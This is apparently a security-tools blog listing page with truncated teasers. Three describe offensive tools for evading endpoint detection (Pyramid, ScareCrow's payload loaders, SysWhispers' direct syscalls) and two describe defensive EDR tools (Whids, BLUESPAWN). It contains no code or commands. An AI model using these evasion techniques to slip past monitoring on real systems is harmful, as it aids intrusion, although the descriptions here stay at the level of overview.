Kali
Pyramid is a set of Python scripts and module dependencies that can be used to evade EDRs. The main purpose of the tool is to perform offensive tasks by leveraging some Python evasion properties and looking as a legit Python application usage. This can be achieved because: For more information please check the DEFCON30 – …
Continue reading “Pyramid : A Tool To Help Operate In EDRs’ Blind Spots”
Whids is a Open Source EDR For Windows with artifact collection driven by detection. The detection engine is built on top of a previous project Gene specially designed to match Windows events against user defined rules. What do you mean by “artifact collection driven by detection” ? It means that an alert can directly trigger …
ScareCrow is a payload creation framework for generating loaders for the use of side loading (not injection) into a legitimate Windows process (bypassing Application Whitelisting controls). Once the DLL loader is loaded into memory, utilizing a technique to flush an EDR’s hook out the system DLLs running in the process’s memory. This works because we …
Continue reading “ScareCrow : Payload Creation Framework Designed Around EDR Bypass”
SysWhispers helps with evasion by generating header/ASM files implants can use to make direct system calls. All core syscalls are supported from Windows XP to 10. Example generated files available in example-output/. Various security products place hooks in user-mode APIs which allow them to redirect execution flow to their engines and detect for suspicious behavior. …
Continue reading “SysWhispers : AV/EDR Evasion Via Direct System Calls”
BLUESPAWN helps blue teams monitor Windows systems in real-time against active attackers by detecting anomalous activity. We’ve created and open-sourced this for a number of reasons which include the following: Move Faster: We wanted tooling specifically designed to quickly identify malicious activity on a system Know our Coverage: We wanted to know exactly what our …
Continue reading “BLUESPAWN : Windows-Based Active Defense & EDR Tool To Empower Blue Teams”
.png)
